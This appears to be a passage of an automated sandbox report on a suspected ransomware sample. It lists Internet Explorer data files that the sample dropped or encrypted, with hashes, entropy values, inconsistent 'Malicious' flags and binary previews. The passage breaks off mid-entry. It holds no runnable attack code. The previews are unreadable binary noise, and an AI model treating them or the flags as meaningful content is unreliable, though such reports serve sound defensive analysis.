                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):660
                                                                                                                                                                                                    Entropy (8bit):7.654325008863378
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:wChCnrNZgs2kM+kC2Ompw9r2WW/RAT4EaRNZVwrbaUp956OM0hJwcii9a:7qks9Hbmpw9r2WaWONo+U8oCbD
                                                                                                                                                                                                    MD5:6468D9D7B3CCAA3112BF64575E6CF5FE
                                                                                                                                                                                                    SHA1:AFC175C497B714667ECF4B7EDB2C698C39E2DA9F
                                                                                                                                                                                                    SHA-256:09A06D9CEA7557FED03AE74A70EB2665C70DB8FCEC0C89BE1E862E476390970D
                                                                                                                                                                                                    SHA-512:B06A8FD3415AEDD7C9896B96EC456E9888D4BB4EF4F04457742B34AC7A5A1677598AD3C43F565A0CB13A21CC4624F5219A93A779C07A193AEEC3CDD307A82FD7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .z.2..{..(.<D.}?..Z...O.'..T..[..0...W...a..8g..f<...=.G....6.s;E.7.......).*..+..\.q.Z_..S..AD.w.0...%......>oR.......G..]z...../El..5$.c..!.o1...y.`@.;G]....W.%..........@A...>o...\Q.;.......M._./.=...M....'.U.E.._...1......5....:}.|S..<.8P...a..8.AH.<gt.....M.m..!\3.6....J.,..C=.m.. .@.`.|..].......!>..n...c..n..jE.'.h.:"..q..I`.4z5..m.o^.. .x...'._....iq..S.W.9.....f..,x...x~...|....!..M..........[.4.Z.<.S..3.z..W..]....+...p....=DvQ.~.k...........i..HY.nk[6.RU(u.3....a.^.t.n..i.....x^.8h.a..f.k........4D5..x.._.^h.o1V...c...m....NP...$....._.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions\en-US.1
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):18505
                                                                                                                                                                                                    Entropy (8bit):7.991108560575374
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:+B6+ccQzSHBxIM4ZCLillBR0MLE43osRttOQ1g6J7:N+cyHn8loM13pftO8gS
                                                                                                                                                                                                    MD5:E25FC973AF42C1A5DD655EC9022D07C6
                                                                                                                                                                                                    SHA1:7F61B8B9EE2F6A9989D01C646C3C7EDBDCB7679D
                                                                                                                                                                                                    SHA-256:8EFBAE251166714A12FB3BF0E193894A965382FEEF46700611C8F92CCE6073C1
                                                                                                                                                                                                    SHA-512:D5A25DFDE5543F75A76CB6244E9D19C4910C78311C2A186164E0605BC714AB27A60319110186E1DD540590F755BD5AB44610A394A6D8144E685F2D7095A355FA
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: TX.^....z.W.....r...`^....v.Y..Z..............g...n:Eu..[Z.cT.....<....b.N|:.....NH..+...l3o.../v....E......._...3.9g.;b......^.E.....D...o.0t.n.....g]>..>.....8..^r..,.r...;._.S.1....T.......R..~....L,i..HT...z.....s.Em..Q.^?..+.%v.......,.e.=..#N^.7..Q..|L.#.E...k._..H.<....0;.H<.u8.s......;..Bm....s.T.j.8..:?.........|..|..^#E.n.|.l*x.eE.....\Z.bP...'1.VD?1D[*....a....,Y.......].*i..".(akc..#.n..J......5o.o;..?.*4}.2.b&..1.,.....M..Z.W!+C.......5Lh...G).zZ.#.!.'[$r.cl...0......:.~.!.~.....:5..|.q..B..*6...#6.....$....U."....g.. .'...k..q..d.2...m...VNxU q..a.[.B...EIY?[.....*W..Y0....O..L...F.'..h@1.....o/q.w.|.UO.E....a. ......g......+|.#..-^p}u./..8pR[,.|..9.QGJZ..[.^].....J..>..s..NZG...h..V....zuE...gD..A-.F.../.V....2t^.H.....U.9v!).....O<.. ....R.2.6.=R.GH>.]H..g O..+..[.p.1....k..X..i...eD.d..J.;-).(.<|A.......OJ.Jq:....-..).ug..e~$rf.)b6.mE..>.T.........k.n.A.$E..X..!..Oa..V..-......)<.......&M#. :].($.X.K.......d..Z.FrZ.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998707045917503
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:dYKGUYChiZoCcx2qWJWRbE5zKbodoSW7Z0Dnn+MrvcNh:pGUYChieCcx2fI9E5zKbQlU0DnnR2h
                                                                                                                                                                                                    MD5:3DC4EFFDD6C7FC33D9A4C8CF22668072
                                                                                                                                                                                                    SHA1:9F6297A8B7EABA0004101B9E879233B3B24EC919
                                                                                                                                                                                                    SHA-256:E2D8A5F2A4169BE1BCB7DFB05192AFF8EEE77E2834BE5BEE355E3BDB8C40708F
                                                                                                                                                                                                    SHA-512:54C8AFBF1EE922D00391B94785950FE85019377E20B97A25A3F442346CEFA0B3B07BF7F63ADB44B8E69B5C732BB952FC74D00991F424303BC9569E049ACAD5D2
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .c..AQ...2]...k.m.%..5...o.p../L..qX..b.....ek..."F.6..q.....y3.OIhd.V.......m.@..rN..K..-.}8.y.,.-........f.\%..(..d..y.#.B,...f..L.N.....h.....:./.|`..e..Pw.m.X&?+.6.c7A.]..q#....Ec)...>K`..O.......4y..vF3..i.=....yz.=._Vl.f.#..T.=7....m..... -.....r....n<V..*.+.._..}.#.T.N|..;...@......e....!..(RF...k.......iN.HX/.1.BT.1K...[h.!o..!.v.h.Qw,......R......e.".N........k.)L....+0.#h;.lI...B.......ZZ.....nf..d'u..`.Y..p.{........8...~...f..EG......p4.DM_.em BGM.7t.B.M.....e....#.J.cX;WE..[Ry.!.9;JR$.k..)j..j9ox....F..%z...J...FeG.qz..<.....r#9r9.Ud......}.![.E....y.I....W.Q.z#.{...R.....!w*.=z......j....G..i.M....L.^.MH....!.@..`.....1.6(.........C,.`7....6A..:G.,..t.4f.~...L..A.V..H..|.p ..0.8..M.g.!.:..>16.E;...{g.?......Tx...8..B..y..g.C..E.{X2"2...E@......H..iCy...O.;D...z.&...gH..?.i"~.iu..}..E..C..s.|..)...{W.d.K..WmW...j..q...Cp...J...@.`.61....i.h....R.....d.....=.......]../...x..M....S....<LL_....^.@f.)f.....v..gy.j...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):49449
                                                                                                                                                                                                    Entropy (8bit):7.995950183247359
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:FvAIGcRTjqh6Rf/sP4aq0RrjVSZNUAxs0XG+UIp/AR:FvAqFjhfO4aq0Rr5SZBxs0XGqW
                                                                                                                                                                                                    MD5:EF1331EA3CC212B76A2600EDA70EA2DD
                                                                                                                                                                                                    SHA1:792FD7BE9238E669B69616823822C54FC9728E7C
                                                                                                                                                                                                    SHA-256:368B524FA48D3B1C73DB0673A51799C252330377A4DF784F5553F2FA01B36965
                                                                                                                                                                                                    SHA-512:E02AF4F03053D90B12623669D20F6AECF1DF11445107576D90D1BC2B0E19E7F0522888316D196D1FB737A49FEDEDE3980183FDBD2717CC4D2E800E79934C8A76
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .;oNJ.y...2.."eG........q.2.....].w..!..G..t...2.1.bC....,,.n\r]A* .*.*C....UQ..K............B.x.e.]..R..?Y].J._a.:B.m^.H=..m....\......"0.@..O.l...~p.'..T.=9 ....Mud....NQ..........S.5..*..&.z...}..Y%..d ...f 1.S...;...(Z..Z.....V..3X.2Z..FN[.0...e.....J.U......1..s.U.P}c......!%1...OzS./Y.......<U.5......{@...T.O..vM..>1......B.R.f='n..f.t.98.~{.....wc...0I....}..7..|.XQ-...y`...uw;.;W...6H...;./1.......... ..e)R.....0...;.X..]._.r.8A.....ha%.aM...H.j.F.B.?`..2..6@.\;.X.`.ZK.(R.lA!..X8....75x.Z.hr...............+.u..P.*..1.....gq.....xv.".2{rI......g9=a.._..d."..w.".....:..-a...~...E.....C...d.....y..$3.....I.E~p...........dW..$X...[g.a....B4..S#-..T.Y.s+.5....cB<Zc..F...T..>8\...G...1....._.....C.../..Y.;..G..C8Z.G. ?n)..f..x.U..@.sQ.m:a.I....}..Nz..C...AYr...V#<.....O...f.......H..#s@.n.%B..+....~...?kywt.....SV..N.9.Y.^w...M...4^..&p......L........c.Zb....".Gu..b..3*..,\...s.;)o.G><jTT,..F|.o..Q......?(....[;.7IVx-.!..../>...]:0...~.....u...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Last Active\RecoveryStore.{412A71A6-9900-11E9-90D9-ECF4BB862DED}.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):7497
                                                                                                                                                                                                    Entropy (8bit):7.975358635872089
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:jF+UUs9u7EBujGQkVjzIjO6jku0FIJRdRQN13qHQgz4d:RbB9AXG7VYjO6jDqIJRQN1qw7d
                                                                                                                                                                                                    MD5:C8429F92E2D346AB7E4D0D2AC9CB668C
                                                                                                                                                                                                    SHA1:082B95116D196CECE3F59DE1BC4E66026B2B333C
                                                                                                                                                                                                    SHA-256:EB7D36E7BC978472B400B59E7F989FF10AE1535C88E668FED2E6BE019D1F7790
                                                                                                                                                                                                    SHA-512:6B9201735E035D4B57157E5723E9981298FD22DD546A41480172AA257DC556ADCEF62C16FBBAC776C060FAA9EB8C36EA7E3582391CC9954A96BDF04C909173D9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .T.3%...v.[.:..R..7.cn.+.V;?'.y.f.u.3.../M...!..h.q3)..+h.I~Ig.......xJ:oB.....0...H.............9...C5` .10.6........|./P.............Gd.-..y.U..xY.s..s..>\8.p.L#jw..[y|g....FP.a......T..8. ..P...Y">k'..Q......^+j.7.....CO>..<. ...;<..I..Lb.l.&.r~.8.....[.@hK2......[.=...;yo.A6...9.sA..........7.J.....fW.;b.....=.......O..V...!;......G..y.f......'_..F...wx9.{..I.W...25. .+..}...F..y..f.J.;.^S........ER....Fk..~..D...2.r....G........Qv.....1k.R..k..Oh..de...uu..p.".rF.....r...N.(o.=....|Sc.s...6..n../d.=...".....|/..89...yN.1.mD.wd....`..T.o-.i3R:,.f.5..T..f[.n}S.=c*..l.U.~hQi..)[....PV.<4............N...x.Fc..U...8...}%...?..kK.9P.XCJO..."..Yf.m....`D..6..v..8.w7..X..H;...._+QU...:s.Q6.@.E.).).s.....~.._ Fk=.?.AF.C..w,wK=...k.b.Oz..(l8..C..L.$...fV.....d..w..3..k ..`...#....wh..Fi..fF;...lO.7.L.Kj.\!!{.I.....&2.]z).EV...1."P086anf...^..%iz..x'.Pc.+eN.@.;b.C.Z.s...%...D...z*Z.'.`@C.^..&h.....I..zWf.C.1oL)..D..1>..[....<...r&...+.........5.1........
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Last Active\{C10454D4-032C-11EB-90E3-ECF4BB862DED}.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):22857
                                                                                                                                                                                                    Entropy (8bit):7.991348589073648
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:hjPOxNZZMtl+2Mtw0xdi1r6MaB+Z7Ik1mlwkmTDf65Dhr12hteCicEbSb0ko:VPK7Ek2P0xdiFRaB+ZIkeAL6l/4tQZsG
                                                                                                                                                                                                    MD5:5356B28339CE5784A73FC48AF35CAB1B
                                                                                                                                                                                                    SHA1:241CF68C206D602C9C74A702D218611D651CB97A
                                                                                                                                                                                                    SHA-256:09537064EE64B44195DE6BC02CE46880A16880334D47D882D0160362C4FB8E55
                                                                                                                                                                                                    SHA-512:D00E730B09558BD6747BA159F67B61356E2A2A5B9E003234F54F6CCC13AFE33CA48EEC97A892F0D5178FA969CE41521D132A7AEEA38B36441CF485C41210885D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..5:.54..?.@P.&......%.Ty._......c!....S.%...0...>zB._.......Ic..p.0.xL..H..!i...I{^H.7.L..82~.9G..8.q.h..".X.wp.?z..{.EIX/....A......s).:..o..........pn..%...&.,..G.&.T..T..e..(.M).c.ZfY..os....#....4.A.}....3.7...&*..g..+.....4L....b....>...G.2.}...DI0P.,........ek%w....> ......r9h..)....G-...R..>I.6...+X..+%m,{"s....?,k............L.9E.ba.T..N.........{P.O.......m....J.......KX..Y.G.O.S....e..&?.Gl'pX+0.....`...rF..9Q>.......#..|.e=.O...B.........4..q.....A..&AY .C.._..=U7. ..q(@....?0...(QKU..(O.Sm.oeVmD..{.`:.....j1..>.G..o4.W............|.E....l...hf......=...../....[!>W ..\y.3...#.... D+.H.?._......J...T.}..n..|.....O.I....D+.~zQ._...=S..Crz..`.....q..4..Q8.Q..9J./M.r. ic.e...`....8pE.IC........}(mAj....>..'f<...rZ~...R.......p..4F.e.;.....E....M.....]..r$F...<.a.E...G......&%.0..z......F...*h8.W......X2a(.;..".....0t.q.....R....9P.`.:..Q.....&B,...(.<..uQ...&....~|0..].R..{i....vBU.g..|..ybj.4..B.Knxi?P.$...a<.[.Z.....={..."M..D.Pj.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Last Active\{C10454D5-032C-11EB-90E3-ECF4BB862DED}.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998805010147209
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:ddKQQjHtyC42o2JJxWrpe4NEQ1g8aj+E2cZ9hjVL+9Ru6Gm14+:d4jkC4sJy171g8ajscnhjquCL
                                                                                                                                                                                                    MD5:6C6195FF9CDEEFA56FAA80BF8B563FE2
                                                                                                                                                                                                    SHA1:85E9DF573AA951A80CC209B06F79ED28A10FA3F6
                                                                                                                                                                                                    SHA-256:714802E1937B7D033FB54257E5CA6AB8DF344A2A81A5B8E11DADCDF96A824ECF
                                                                                                                                                                                                    SHA-512:F428B7EE382F53C276A4A1C600E6C98E30D66509482BE327173AEF19CB9C468AF12592455E36AF46F375EBB7EC8491F09EFBADB1BE40716BD3D93D01F61A9C0B
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .......!..U..lv..[...x.w....;.yiM1j....<.....C.....@DT.......4.T..'......x_.[8.NA`..7Y....M.R..H|..j..TzE.....K..|-.D_.{..#.m<.e...4.#......J.{K....F8Q."I+Q..%...U=,86._...`A.*.i.....~.4..kg....K.C.]%.6.."LI$..0M....$...U}...7.ce ...,eo.`@q..........=..S.%.J...a.......>,d.A..H.|e...........kz...b..@4.@1.E.R.....|..U?.|..5I).......S..s.....V...&.-...nDn..aH".D..k95$.7.K...HqX...b...G.'..5.._R.PEn0.n..u.......,...n .J<..*+..j..`..2........k*..c1..;w.....-.`=.;..nf=..`lL.......R.....w.Y...W..%.~..1...y.O~..\.)...b.....#... .l.p.....sr.Z.z.?/t..~J...).d......fl....+2..R._y..$q.A....d.!.[.).....Q.'8..(. o..D.|^..W.u....7Q...v.z.v...*KY}P#..w...]0..'1~.z.fy...w,w>N..U.v.8....IV!...g..q.X....C...!.B'..^=....!jFQ..|..n^<.](.?...*.\.cd....{Z....._..Q.?4_.>.ZP.FOP.-...7.#......._....W..5Hm...0..c?.*.......Q..........Vi>Y..o.y.1`.X..4..KQ"^.B,.M}..?.`...[.c.CYL..w[d.3-...9...".!.U,..4P.S..0..L..Bqy...f7...S;b+......O.8.3.'...... <.5..h../.M..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-314712940\msapplication.xml
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):739
                                                                                                                                                                                                    Entropy (8bit):7.69076910293877
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:VCIuVqW7pbk0YwpctWYniabcxKtmo02MT9nkqk9yMtL53LOIuQ2YuGhicii9a:V3un7pbDctjNcMtmo0rVkp5OUQbD
                                                                                                                                                                                                    MD5:9E3DF67BCBDD13D79C5AEFB4474A38E1
                                                                                                                                                                                                    SHA1:1C96A1E0A754E66529BA422C30C22BE3975FEC5D
                                                                                                                                                                                                    SHA-256:906FC379CCCC485D95E81EBF32AC615C2D4B06B48EF8DEA256369E2C2DCFF545
                                                                                                                                                                                                    SHA-512:B0AB59D641A68A334185DE9064D9172A0340E14963283016B2AD1F349B19CBB3DB6491E567B888099302A07080B3BC5E577513EE2896A3D7930FBB0B321BAA1C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..p../C.;,.+...%...4....ExWS.........r....?....+gw.$. ....+.#L=....7.T,.....;.Ow.,.....^.=K..q:..E~aq1.....N....nV.....D.... S..1D...............V..u.......{..%....9..6..).}....[.1...u.X.....X.......^..../M%..,R.W...Q. .c..r......Fz.C.!p..........k..K.....=........q..VP..0..]..c.P....J.6..,.....M...N.T.K.t.}...%W.......p.t.R......9<.&6.....WH.^.1.!X....[ .LQ.w.RG8&9...p $....-....U...o..3..q'f.4s..:D.E.........Nb.i...exWl.....!...sg...\......=..O..."j<...B.iZ.:..P.S*{..\...U].`.s....8......._...X:4.Y...S...G.:...9\...]Oj.x.8&.K....d=..j.J"\|.....T..qe..+..C!...../s...]..i...L.,..M.....Lk.5......v.T........y.S.m...|4.YO<.....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):35946
                                                                                                                                                                                                    Entropy (8bit):7.995196562820894
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:PhjRl7nU0r2lyRYCMX1HGtTGnfU9EdA27UXN:P1nKSUFwqfUa78N
                                                                                                                                                                                                    MD5:F2444EE78558517140223A2F94863492
                                                                                                                                                                                                    SHA1:2AD99F880CA93B3D5D9D1A1DF8D322623709029F
                                                                                                                                                                                                    SHA-256:FA01DE2EDE9E6A9AB3E071DC7ABC09C7099558B3EFFC318D11EF84038015B2E7
                                                                                                                                                                                                    SHA-512:646AA13AFF9D39D3F666D0591B62B3A661D3F9E25FA089B633B85FA4DCDDA6FDD0912D04E543BEA506FA845B4DC51952C41D77A4C15D54D021013BBF04527AD4
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .J*........CM.)..5{(./..Ad.0....%.g.(....C....K.u..{A..$.}....r.k.i{......9UY:5J..+.t.aN.sx...0=@.T..........q. ...D\...Li....D.......>.i.P......'{....|....Qsm.mO.J6=..o!Af...i]..pz.....e.l..'.~...$.+k1+1...e..g.=n......<^dr|.1...UM..b#..}:........v$.WI.^$...6^.j.].X....f=.%...d.?.U..u.. z..R........y.....E.Qk.....n..,.fO.....L..M.kl.O.GG...#[.1.,..l..*..Wx....$W.J..a...u...v...2.MS%{.z5.~.4.=[...p..<..j..W.T...|...}..?....@.b.....5...<5.ri..e..CZ.e[.U...8....H.}.bX>.....sj.....{..=D7..:.|..\TP$.#...9-.N.y.r".G.xJ.(...:..K.7..c.=.1..5..t.c!.......&...j.J.:..d...6....J.-?....a~D.3h...Zt.G.^.*.R....&.).........%s.o..z..s%._{Y......u......4. .....J...!..H.....B.>.rQ...N..m.....&bX.x.nK&H..R....G)W..`.}.0Q.C.\....;6o.....8....:.....q..i..4..1]8.X.{.i..EeU...|$3....Hzk.Pd.....Y....4...h..a}...L{s..C<..a.E~.m.B.......HY/b.P..w.k*.........g.7%....>f*.:.Aq..5..#....d)...Q.?.t.9.....6.^LC..C..>....S..9.%-...VO.M..k.\..hu\...'.B.....4..._OCT.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\VersionManager\versionlist.xml
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16174
                                                                                                                                                                                                    Entropy (8bit):7.986307416528161
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:P/0SOJ+F32ueP04EFpFdtslre9FDLzkCSOpgEqC8P7e6J14b:dOc3264M3dtslyPJrzp8PKM4b
                                                                                                                                                                                                    MD5:F551CCAC5688D0B2DB91B097B8F5C604
                                                                                                                                                                                                    SHA1:831408C8FD88CAB256CAB10E7014C65D6DBB6F2D
                                                                                                                                                                                                    SHA-256:74EB366E308F5F93F1D9BAEEB1B2274F06B18BF1F8A0B5054A2F2E9FEA4133A4
                                                                                                                                                                                                    SHA-512:C94A295C352ABEBD1851F9DA2B3F5AD973C242D2E00E907A7B577458AA5B89AB976AF44239A8473583B451AFDD51A9AA14C6818B945BEC58DE51DB44437C9054
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......9..k...N....."Y.6.C()....C.Y...?.....87...@.=A..L_P..-.....ZV..~..'..Y.J.j+........p.$...6.96k.......I......*../dZ.<T.U....5%.]..Q..a3.f.....A..t..o.].<-Gq......0.i....0.B..pE..=......'..........o.S.%r8.M..?jwQ...{.rT..0.Q.,/-.../_xW.].2x.aR....x..\.9z.9.Ap}pN.....{...{.|.k..3.s$.G..Q...'...M...f.5.>[.k.q.}.9Q.Sp.."..}..uN..........@.z...v..~..Pu.J.5f.._t..z....qQY..z....M.Y.as0....n.............|..%......t.s....aV..#/.....KM#?...A....pF....2......9..<wf(D0......_J.p0{........8.3.Yp!...T..t.#1..._I.ZR..).Z.C.s...kZC..s|..$O`2Q...X.......IZB..4.....a..-....t....(.......R.%.>......R.p.....X"....K.".X./...Y..K*..m.......sj..#...,.(..z......}..V(...W...(.8..........G.F.W,..@....u...z....'...0.U.....[;.Y.........k........'.OA.......dZ..c..DN"+.Z.......a.v.}..X...G..R%7.r.vA.'.d.5.E5...p......#y...0 .."Q.^...@.5..1.f+.D."z...w! .D.....JA....,..UY.^m...^....7....x.oZ.J.z4.x.^cw^..6.W.a...d.IgC..<...y.8>..........i...R.R..C!...yD_..m\.<..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6901
                                                                                                                                                                                                    Entropy (8bit):7.975849471324671
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:cTOgRs41kco4SCSpJ0lWI5W25TaXbPdAGddYjKbEuI8w9pFK8v:+iG+4ap05T5TaXbPdAGddYjKAZrv
                                                                                                                                                                                                    MD5:608592A0743ADD8B8490CF1F53C18195
                                                                                                                                                                                                    SHA1:DA17EC502BE96119EE79BA54F9DB6ACEB60D6AEF
                                                                                                                                                                                                    SHA-256:9C5A8C024E08CE63FF6365D1E2897CD7CDB4BA2801DD71D2EEBCAEE5D1352363
                                                                                                                                                                                                    SHA-512:04B83AB90CA574C0552E62CE94DBD9C3CD0D3E72011F4937FD349F664B2C041834A257DFC5743775A5872020D4CEC499DC988D3091AEDEA2B03F3E611E4062B5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: n...W<.^.....<.|9.*~e........+...,G.e.....'.zK.l; %S....P..........w.[..P..nY..iH..6...n....`...j........17..uYX2....<.......FM.....wc..]g....o-....8...3.."..o...2.r2:.q#.K..o..&Pg.>/j..H..ss..)...... .s...FQ....P...1;....a.A\P.....^i.~..Qb..!%....I..r.O..O.i7...K..qtf|..k.........K.b1.h.l:{..g.3...A.L..X...............o.B.H,....+...q.+c..M.&...1...3.1X.B...o..4.$.....|..Ro.P.3...*..5.N@.{~c.W.....~e.+:..Id...c..M1o........ON....]=;.R...9.D2E..$L.r...J..%.Ql.I`......$..\......TIj..U..%..-"....uI.r7.h.OX[m.ht:..Xe+..i....j..CS(}...JG.c.....9...<7.J....3..-B.....%[..P.Wd...s..I)\Q3..K..VT...K.Ks6.ia..n.h...\....,..z...c$...(....^vW.....b.h..+..L.....7.........m39....<.....Q.g.3..........&....7).]..0=...8.:.l%.G.,M.F.....m.dg...pj(.........0B...m?7>i.o....,.".\u+.!F.......Z/.....UF'G..t....I...FEC.g.(4..$........L.../.XFr. ......t.1...b..&....a.."..|."...2.h...]7.u....T.U.bkFg.....<y..C.+.`...d.J.Dtj.miJ.]}...W?r.u.M.`.R..I.....N.e
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1267
                                                                                                                                                                                                    Entropy (8bit):7.832950728347821
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:hu3oGw2suK765XVazbaIT/gfpiMfFhf8hbtBKpyVD9bD:koGwbIVybZT/KpdLf8hbtQpyVxD
                                                                                                                                                                                                    MD5:8ED38A80239064712D5A63749D5271D1
                                                                                                                                                                                                    SHA1:2876BFB1C6C8A94E1ADBE43553C20E78821757D4
                                                                                                                                                                                                    SHA-256:EF6381492AB6C180749D48B2EF903A1AFB1AA2499ECCD462CB40311E9F217426
                                                                                                                                                                                                    SHA-512:80BCF65D34FEA47F8421CC227E2583D3A8FF282A0321AABADC35E800E1AE87EAC1FFAF5BB106E29354B0BF74E66168E1BBB238CA9EDEA67952BC8E57F18918B9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: a.....O...`5...=u.g......k_.\O_.{.:BX(.^....9./vx.YT....]..!.C.(...S.3{.'..t..NG...I.#..2.....[..>K.$...!8.!s.F.G...D.....jH.^.......d,...q0...q..|x)I.#..,o2?..B..&.O.G|.Y.mR"B.o.7#..2.w.drh..".[..t........p.~.D.AS..O........'l:Q........n..a..P8.{|.....a.].......z...6...g.~]).._p..q....%..D..r....@....}.R...].....!.e..$..i\....y..m..Ebl.U./.w|..8..........R..Id~..O...0Z.Ip.Lg.. .b."..[`.Rx..a.....b5.9.S<:..B[b...&.-.G.!...}7.[).E....!./........x....9..X@rU...B35B.D.N.[.ud.s..C.D.".[..n@,z..9..H.p.........+....D&.u...*......Z[...Q<.!..W..5.O..t=X....QqR.G.9...N..`I*...{g;........|..z.Q...T...F.p.......AU....IH.MM .....=....rR_....l.~.Ip..$...`.&p... ...p.....G!.r#-..t..M...IHUPbj...lA...N...._'...|*..]749../........n.nU...obArS..]..'...._.G..X.V8.\...%...._.g.S.Ia>.z./...r......9.O>nG.uW.G(...5.y...(.Y...K..O..|v..... ...x....l..OV5,..3Le..L...6......gp.."..l 6.d9.3.M..p..A.9...H.B0f1......G)....CM......F6.rp.......&.S.B...F}C...|....*pk
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-UserConfig.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1643
                                                                                                                                                                                                    Entropy (8bit):7.880980242467092
                                                                                                                                                                                                    Encrypted:false
